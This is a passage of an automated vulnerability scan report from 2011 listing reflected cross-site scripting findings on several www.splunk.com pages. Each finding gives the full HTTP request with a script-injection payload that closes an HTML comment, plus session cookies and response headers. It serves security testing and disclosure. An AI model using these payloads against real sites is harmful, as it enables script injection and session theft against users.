GET /index.php/sso_checker70637--><script>alert(1)</script>77207d79957?return_to=http://splunkbase.splunk.com/account:session/?redir=%2F%3F1ffc5%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E46cc332d1dc%3D1 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://splunkbase.splunk.com/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the return_to request parameter is copied into an HTML comment. The payload cb2a8--><script>alert(1)</script>e93abf9519f was submitted in the return_to parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/sso_checker?return_to=cb2a8--><script>alert(1)</script>e93abf9519f HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://splunkbase.splunk.com/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c0d74--><script>alert(1)</script>8f02be6ddd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /industriesc0d74--><script>alert(1)</script>8f02be6ddd8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.408. http://www.splunk.com/industries [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /industries
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 75e78--><script>alert(1)</script>332b08a5ae1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /industries?75e78--><script>alert(1)</script>332b08a5ae1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:27 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 95797
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload f689f--><script>alert(1)</script>9d4a21b7d08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagef689f--><script>alert(1)</script>9d4a21b7d08/all_experts HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:10 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:10 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:10 GMT; path=/ ETag: c0672478f6ca46e6740bcee5ed5464471296943931 Last-Modified: Sat, 05 Feb 2011 22:12:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8d227--><script>alert(1)</script>da8a26b86d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts8d227--><script>alert(1)</script>da8a26b86d4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:43 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.411. http://www.splunk.com/page/all_experts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /page/all_experts
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 96742--><script>alert(1)</script>c4667e6c867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts?96742--><script>alert(1)</script>c4667e6c867=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:37 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e01b96203727ff9d6d8991794cf03c091296943897 Last-Modified: Sat, 05 Feb 2011 22:11:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload f24d0--><script>alert(1)</script>6e2f687f5f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagef24d0--><script>alert(1)</script>6e2f687f5f2/all_experts/partner HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:06 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:06 GMT; path=/ ETag: 53ca885bca9987a6ba65090033be63411296943926 Last-Modified: Sat, 05 Feb 2011 22:12:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload eb983--><script>alert(1)</script>37e17e49981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_expertseb983--><script>alert(1)</script>37e17e49981/partner HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 60086--><script>alert(1)</script>4a340830a77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts/partner60086--><script>alert(1)</script>4a340830a77 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:19 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 8284e3c5e69fc621f0a7f0694f54f6db1296943999 Last-Modified: Sat, 05 Feb 2011 22:13:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.415. http://www.splunk.com/page/all_experts/partner [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /page/all_experts/partner
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b09ec--><script>alert(1)</script>9d2ae226d37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts/partner?b09ec--><script>alert(1)</script>9d2ae226d37=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:32 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 3e43cea02b2a149bca9cf3e40bbf22321296943892 Last-Modified: Sat, 05 Feb 2011 22:11:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e5a84--><script>alert(1)</script>e63bcaac2f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
